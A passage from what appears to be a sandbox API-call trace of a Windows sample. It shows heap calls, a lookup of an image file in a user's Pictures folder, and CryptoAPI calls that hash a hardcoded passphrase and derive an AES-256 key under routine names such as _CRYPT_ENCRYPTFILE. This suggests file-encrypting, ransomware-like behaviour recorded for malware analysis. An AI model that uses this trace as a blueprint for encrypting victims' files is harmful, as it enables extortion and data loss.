dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0094.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0094.959] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0094.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0094.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0094.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0094.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0094.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0094.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0094.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0094.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0094.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0094.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0094.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0094.960] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\X0f8JSrsqtdBsB.png", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38d69400, ftCreationTime.dwHighDateTime=0x1d5ee87, ftLastAccessTime.dwLowDateTime=0xcb7e1b10, ftLastAccessTime.dwHighDateTime=0x1d5efeb, ftLastWriteTime.dwLowDateTime=0xcb7e1b10, ftLastWriteTime.dwHighDateTime=0x1d5efeb, nFileSizeHigh=0x0, nFileSizeLow=0x18cd8, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="X0f8JSrsqtdBsB.png", cAlternateFileName="X0F8JS~1.PNG")) returned 0x41ac2c0 [0094.960] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0094.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0094.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0094.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0094.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0094.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0094.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0094.961] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0094.961] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.961] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0094.961] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.961] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0094.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0094.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0094.962] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0094.963] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0095.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0095.010] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0095.010] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0095.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0095.010] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0095.010] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.010] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0095.010] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cab80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0095.011] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0095.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0095.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0095.011] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0095.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0095.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0095.011] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.011] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cab20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0095.011] CryptHashData (hHash=0x41ac740, pbData=0x17e2788, dwDataLen=0x22, dwFlags=0x1) returned 1 [0095.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0095.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0095.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0095.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0095.013] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0095.013] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac58 [0095.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0095.013] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0095.014] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab38 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0095.014] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0095.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0095.015] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.015] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0095.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0095.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43cab38 [0095.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cab38, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0095.017] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac740, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac780) returned 1 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0095.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0095.018] RtlAllocateHeap 